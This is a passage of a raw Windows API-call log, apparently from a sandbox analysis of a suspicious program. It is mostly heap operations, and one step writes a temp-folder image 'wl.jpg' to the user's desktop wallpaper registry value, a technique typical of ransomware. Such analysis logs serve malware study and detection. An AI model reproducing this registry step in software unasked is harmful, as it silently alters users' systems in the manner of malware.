dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0307.150] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0307.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0307.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0307.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0307.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0307.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0307.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0307.152] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0307.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0307.153] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0307.153] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0307.153] RegCloseKey (hKey=0x294) returned 0x0 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0307.154] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0307.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0307.154] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0307.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0307.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0307.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0307.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0307.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0307.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0307.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0307.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0307.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0307.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0307.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0307.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0307.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0307.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0307.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0307.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0307.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0307.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0307.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0307.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0307.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0307.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0307.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0307.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0307.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0307.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0307.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0307.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0307.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0307.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0307.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0307.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0307.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0307.158] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0307.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0307.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0307.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0307.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0307.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0307.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0307.159] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0307.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0307.159] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0307.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0307.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0307.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0307.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0307.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0307.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0307.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0307.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0307.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0307.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0307.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0307.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0307.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0307.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0307.162] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0307.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0307.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0307.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0307.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0307.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0307.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0307.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0307.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0307.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0307.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0307.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0307.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0307.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0307.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0307.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0307.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0307.163] RtlAllocateHeap 